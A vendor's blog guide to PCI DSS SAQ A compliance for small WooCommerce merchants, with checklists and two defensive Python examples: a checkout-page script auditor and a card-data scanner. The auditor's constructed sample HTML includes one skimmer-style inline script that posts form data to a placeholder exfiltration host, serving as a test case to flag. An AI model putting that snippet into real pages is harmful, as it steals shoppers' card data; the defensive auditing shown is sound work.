
PCI Compliance for Small Business: What You Actually Need to Do

PCI DSS compliance sounds intimidating, especially for small business owners without a dedicated security team. The good news: if you’re using a hosted payment solution, your actual compliance obligations are much smaller than you might think. This guide cuts through the complexity and tells you exactly what a small WooCommerce merchant needs to do.

ConvesioPay’s hosted checkout reduces your PCI scope to SAQ A, the shortest Self-Assessment Questionnaire, which is designed for merchants who never handle raw card data. Get started →


1. The Key Insight: Your Payment Setup Determines Your Burden

PCI DSS compliance isn’t one-size-fits-all. The compliance requirements that apply to you depend almost entirely on how your payment system handles card data.

If your WooCommerce store uses a hosted checkout (like ConvesioPay’s payment widget), the cardholder enters their card details directly into a form hosted and secured by your payment processor. The card data goes straight from the customer’s browser to the processor’s servers; it never passes through your WordPress installation, your hosting server, or your database. One caveat worth checking: SAQ A eligibility for e-commerce depends on the card fields themselves being served by the processor, either on a page the shopper is redirected to or inside an iframe the processor hosts. If the card fields are rendered by your own page and only the JavaScript that posts them comes from the processor, you fall under SAQ A-EP instead, which is considerably longer. Confirm with your processor which integration you are on.

In this setup, the processor (in ConvesioPay’s case, Adyen, a PCI DSS Level 1 service provider) carries the hardest parts of PCI compliance. Your responsibility narrows to making sure your own website cannot be used to undermine that checkout: keeping WordPress secure, controlling what runs on the checkout page, and never handling card data yourself.

This qualifies you for SAQ A — the simplest Self-Assessment Questionnaire, designed exactly for this scenario.


2. What You Actually Need to Do (SAQ A)

For a small WooCommerce merchant on SAQ A, here’s the practical checklist:

Your Website

  • Use HTTPS everywhere — your entire site, not just checkout. Redirect plain HTTP to HTTPS and serve only TLS 1.2 or higher (PCI DSS no longer accepts SSL or early TLS). Free certificates are available through Let’s Encrypt; Convesio provisions them automatically
  • Keep WordPress updated — core, themes, and plugins. Known vulnerabilities in outdated plugins are one of the most common ways ecommerce sites get compromised, and a compromised site is how an attacker reaches your checkout page
  • Use strong passwords — minimum 12 characters for WordPress admin accounts, unique to each account; use a password manager
  • Enable MFA on WordPress admin — WordPress core does not ship multi-factor authentication, so add it with a plugin (authenticator app or hardware key) and require it for every administrator and shop manager account
  • Audit checkout page scripts — keep a written inventory of every script that loads on the checkout page, with who owns it and why it is there, and review it whenever plugins or themes change. Any script on that page can alter the page, overlay a fake card form or redirect the shopper, which is how injected skimmers steal card data from sites that never touch it themselves. PCI DSS v4 spells this out (requirement 6.4.3 for the script inventory and 11.6.1 for detecting unauthorized changes to the payment page), and SAQ A v4.0.1 asks you to confirm your site is not susceptible to script-based attacks
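The script audit above is the one SAQ A control that benefits from tooling. The following is an added example (not ConvesioPay, Convesio or Adyen code) of a checkout page inventory check: it lists every script on the page, flags origins outside an allowlist, warns when an approved third-party script lacks a Subresource Integrity hash, and compares inline scripts against a baseline of hashes so an injected snippet shows up as a finding. The approved origin, the baseline snippet, the integrity value and the sample checkout HTML are all constructed for the example.

```python
"""Checkout page script inventory check.

Added example for this article; it is not ConvesioPay, Convesio or Adyen code.
The approved origins, the baseline of known inline scripts and the sample
checkout HTML are constructed for illustration.
"""
import hashlib
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hypothetical origins approved to run script on the checkout page.
# Relative URLs (scripts served by your own WordPress install) are inventoried but allowed.
APPROVED_ORIGINS = {
    "pay.example-processor.com",   # hypothetical processor SDK host
}

# Inline scripts you have reviewed, kept as SHA-256 of their stripped text.
KNOWN_INLINE = ["window.wcCheckout={locale:'en'};"]   # constructed baseline entry


def script_hash(text: str) -> str:
    """Stable fingerprint of an inline script, ignoring surrounding whitespace."""
    return hashlib.sha256(text.strip().encode("utf-8")).hexdigest()


BASELINE_INLINE_HASHES = {script_hash(s) for s in KNOWN_INLINE}


class ScriptCollector(HTMLParser):
    """Collects every <script> element: external src, SRI attribute, inline body."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            a = dict(attrs)
            self._current = {"src": a.get("src"), "integrity": a.get("integrity"), "inline": ""}

    def handle_data(self, data):
        if self._current is not None:      # HTMLParser delivers <script> bodies as data
            self._current["inline"] += data

    def handle_endtag(self, tag):
        if tag == "script" and self._current is not None:
            self.scripts.append(self._current)
            self._current = None


def audit_checkout_page(html, approved_origins, baseline_hashes):
    """Return the script inventory plus findings that need a human decision."""
    parser = ScriptCollector()
    parser.feed(html)
    parser.close()
    inventory, findings = [], []
    for s in parser.scripts:
        if s["src"]:
            host = urlparse(s["src"]).hostname or ""     # "" means a relative, self-hosted URL
            inventory.append({"type": "external", "src": s["src"], "host": host or "(self)"})
            if host and host not in approved_origins:
                findings.append(f"unapproved script origin: {s['src']}")
            elif host and not s["integrity"]:
                # Approved third party but no Subresource Integrity: a silent change at the
                # origin would reach your shoppers unnoticed. Warn rather than block.
                findings.append(f"approved script without integrity attribute: {s['src']}")
        else:
            h = script_hash(s["inline"])
            inventory.append({"type": "inline", "sha256": h})
            if h not in baseline_hashes:
                findings.append(f"inline script not in baseline (sha256 {h[:12]}...)")
    return {"inventory": inventory, "findings": findings}


# Constructed checkout page: two legitimate scripts, one reviewed inline snippet,
# then an unapproved third-party script and an inline snippet nobody reviewed.
SAMPLE_CHECKOUT_HTML = """<!doctype html><html><head>
<script src="/wp-content/plugins/woocommerce/assets/js/frontend/checkout.min.js"></script>
<script src="https://pay.example-processor.com/sdk/v5.js" integrity="sha384-CONSTRUCTED-VALUE"></script>
<script>window.wcCheckout={locale:'en'};</script>
</head><body>
<div id="checkout-widget"></div>
<script src="https://cdn-analytics.example.net/stats.js"></script>
<script>window.__relay=function(f){return fetch('https://exfil.example.org/c',{method:'POST',body:new FormData(f)});};</script>
</body></html>"""

if __name__ == "__main__":
    result = audit_checkout_page(SAMPLE_CHECKOUT_HTML, APPROVED_ORIGINS, BASELINE_INLINE_HASHES)
    for entry in result["inventory"]:
        print("inventory:", entry)
    for finding in result["findings"]:
        print("FINDING:", finding)
```

Run it against the live HTML of your checkout page (for instance saved with curl while logged out) from a cron job or a CI step, and treat every finding as a change to investigate before shoppers do. The inventory it prints doubles as the script documentation PCI DSS asks you to keep.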

Your Payment Processor Account

  • Use strong, unique credentials — strong password and MFA on your ConvesioPay / Adyen dashboard account
  • Limit access — only people who need access to the payment dashboard should have it
  • Verify processor compliance — confirm your processor maintains PCI DSS Level 1 validation. Validations are renewed annually, so ask for the current Attestation of Compliance (AOC) each year and keep it with your SAQ. ConvesioPay is powered by Adyen, a PCI DSS Level 1 service provider

Your Team

  • Don’t store card data — never write down or store card numbers, CVV codes, or expiry dates. This includes not storing them in notes, spreadsheets, emails, or support tickets
  • Know your incident response — if you suspect a breach (an unfamiliar script on the checkout page, an admin account you did not create, customers reporting fraud after buying from you), contact your payment processor and acquiring bank immediately, and preserve logs and the affected files rather than rebuilding the site first

Annual Compliance

  • Complete the SAQ A annually — it’s a relatively short questionnaire, ending in an Attestation of Compliance (AOC), that documents your compliance status. Submit it to your acquiring bank, or to your payment processor if it collects it on the acquirer’s behalf, and keep a dated copy; your acquirer can ask for it at any time

3. What Your Hosting Provider Handles

When you use Convesio for WordPress hosting, the hosting layer covers significant security requirements:

  • Server-level firewall and network security
  • Isolated container architecture (no shared hosting risk)
  • Automatic SSL/TLS certificate provisioning and renewal
  • DDoS protection
  • Server software patching and maintenance

This means the infrastructure-level security requirements in PCI DSS are handled for you; you remain responsible for the application layer (WordPress, plugins, and how you use the payment system).


4. What Your Payment Processor Handles

ConvesioPay (powered by Adyen) handles the most demanding PCI requirements:

  • Secure storage and processing of all card data
  • PCI DSS Level 1 service provider validation (the most demanding level, assessed on site every year by a Qualified Security Assessor rather than by self-assessment)
  • Encryption of card data in transit and at rest
  • Tokenization — stored payment methods are represented as tokens, not raw card numbers
  • Fraud and security monitoring of payment infrastructure

5. What You Must NOT Do

A few practices that would expand your PCI scope or create violations:

  • Don’t use a payment plugin that sends card data through your server — some older or poorly designed WooCommerce payment plugins post the card number, expiry and CVV to your own WordPress site first and relay them to the processor from there. That puts card data in your environment and pulls you out of SAQ A into a much longer questionnaire. A quick check: open the browser’s network tab while paying with a test card; if any request to your own domain carries the card number, the plugin is doing this
  • Don’t store CVV codes — the card security code may never be stored after authorization, and an SAQ A merchant should never see it at all. Storing it, even briefly and even by accident in a log or a ticket, is a serious PCI violation that can cost you fines and your ability to accept cards
  • Don’t accept card numbers over phone/email and enter them manually — if customers call or email you their card details and you key them in, that card data is now in your environment (phone system, inboxes, your workstation) and you no longer qualify for SAQ A
  • Don’t skip WordPress updates — unpatched vulnerabilities in WordPress, WooCommerce or any plugin can give an attacker the foothold needed to modify your checkout page and inject a skimmer
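Both “don’t store card data” in the team checklist and the first three items above come down to one verifiable fact: a card number or security code never appears in anything your own systems receive or keep. The following added example (not ConvesioPay code) scans text for primary account numbers, using a Luhn check to discard order numbers and other digit runs, and for security-code fields. It runs over three constructed inputs: a form post from a badly designed gateway plugin, a clean post from a hosted checkout that carries only a token, and a support ticket where a customer pasted their card. The field names, request paths and token format are assumptions; the card numbers are the public Visa, Mastercard and Amex test numbers.

```python
"""Find card data where it must never be: in requests reaching your own server,
in support tickets, in notes and logs.

Added example for this article, not ConvesioPay code. Every sample input below
is constructed; the PANs are the public card-brand test numbers.
"""
import re

# 13 to 19 digits, optionally separated by single spaces or dashes, not part of a longer run.
PAN_CANDIDATE = re.compile(r"(?<!\d)(?:\d[ -]?){12,18}\d(?!\d)")

# Common field names for the card security code, followed by 3 or 4 digits.
CVV_FIELD = re.compile(
    r"\b(?:cvv2?|cvc2?|csc|card[ _]?code|security[ _]?code)\b\s*[=:]\s*(\d{3,4})\b",
    re.IGNORECASE,
)


def luhn_valid(digits: str) -> bool:
    """Luhn checksum: every real card number passes, about 9 in 10 random digit runs fail."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:          # double every second digit from the right
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def mask_pan(digits: str) -> str:
    """First six and last four are the most a merchant may display; never log the rest."""
    return digits[:6] + "*" * (len(digits) - 10) + digits[-4:]


def find_card_data(text: str, source: str) -> list:
    """Return masked findings for PANs and security codes present in `text`."""
    findings = []
    for m in PAN_CANDIDATE.finditer(text):
        digits = re.sub(r"[ -]", "", m.group(0))
        if 13 <= len(digits) <= 19 and luhn_valid(digits):
            findings.append({"source": source, "kind": "PAN", "value": mask_pan(digits)})
    for _ in CVV_FIELD.finditer(text):
        # The code itself is never kept, not even masked: its presence is the finding.
        findings.append({"source": source, "kind": "CVV", "value": "***"})
    return findings


def scan_all(samples: dict) -> list:
    """Scan a mapping of source label -> text and concatenate the findings."""
    results = []
    for source, text in samples.items():
        results.extend(find_card_data(text, source))
    return results


# Constructed inputs. Paths, field names and the token format are assumptions.
SAMPLES = {
    # What a plugin that relays card data through WordPress would post to your server.
    "POST /wp-admin/admin-ajax.php":
        "action=wc_pay&order=1000234567890&card_number=4111 1111 1111 1111&exp=12/27&cvc=123",
    # What a hosted checkout posts: an order reference and a token, never the card.
    "POST /?wc-ajax=checkout":
        "payment_method=convesiopay&payment_token=tok_example_9f8e7d&order=1000234567890",
    # A support ticket where the customer pasted their card details.
    "ticket #4821":
        "Hi, my card 5555-5555-5555-4444 was declined twice, security code: 321",
}

if __name__ == "__main__":
    for f in scan_all(SAMPLES):
        print(f"{f['source']}: {f['kind']} {f['value']}")
```

Pointing the same function at your web server’s request logs (if they capture bodies), your helpdesk export and a database dump is a cheap way to prove to yourself that the “we never see card data” statement behind your SAQ A is true. The Luhn check filters out roughly nine in ten random digit runs, so the remaining hits still need a human look, and any confirmed hit is an incident to report to your processor, not just a line to delete.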

6. Finding Your SAQ and Submitting It

SAQ forms are available from the PCI Security Standards Council at pcisecuritystandards.org. Download the SAQ A form, complete it (it will take 30–60 minutes), and submit it to your acquiring bank or payment processor. ConvesioPay can provide guidance on where to submit your completed SAQ.

For broader PCI context, see PCI DSS Compliance Checklist: A Step-by-Step Guide for Merchants and PCI SAQ Types Explained: Which Self-Assessment Questionnaire Do You Need?

Convesio + ConvesioPay is the PCI-smart stack for WooCommerce. Isolated hosting, hosted checkout, and Adyen’s Level 1 certification keep your compliance scope at SAQ A. Get started →

Updated on June 19, 2026
